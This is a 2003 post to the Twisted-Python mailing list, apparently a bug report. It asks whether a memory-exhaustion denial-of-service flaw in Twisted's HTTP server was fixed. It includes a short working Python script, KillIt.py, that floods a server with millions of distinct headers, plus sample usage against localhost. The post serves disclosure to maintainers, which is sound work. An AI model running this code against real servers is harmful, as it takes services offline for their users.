[Twisted-Python] ANN: Twisted 1.0.6 (includes security fixes)
Andrew Dalke
dalke at dalkescientific.com
Tue Jul 1 12:04:52 MDT 2003
Me:
> Was the out-of-memory denial of service attack fixed?
>
>
> http://www.twistedmatrix.com/pipermail/twisted-python/2003-June/
> 004462.html
Err, that code doesn't actually work (it reuses the same header names,
so there isn't a memory problem). Here's some real attack code
===== KillIt.py
import socket
class KillIt:
def __init__(self, where):
self.f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.f.connect(where)
self.f.send("GET / HTTP/1.1\r\n")
self.n = 0
def kill(self):
factor = 1000000
for i in range(self.n*factor, (self.n+1)*factor):
self.f.send("%s: X\r\n" % i)
if i%1000 == 0: print i
self.n += 1
=======
>>> import KillIt
>>> server = KillIt.KillIt( ("localhost", 8080) )
>>> server.kill()
... lots of output showing that it's dumping headers ...
>>> server.kill()
... each invocation takes about 50MB or so
>>> server.kill()
... repeat until desired ...
Andrew
More information about the Twisted-Python
mailing list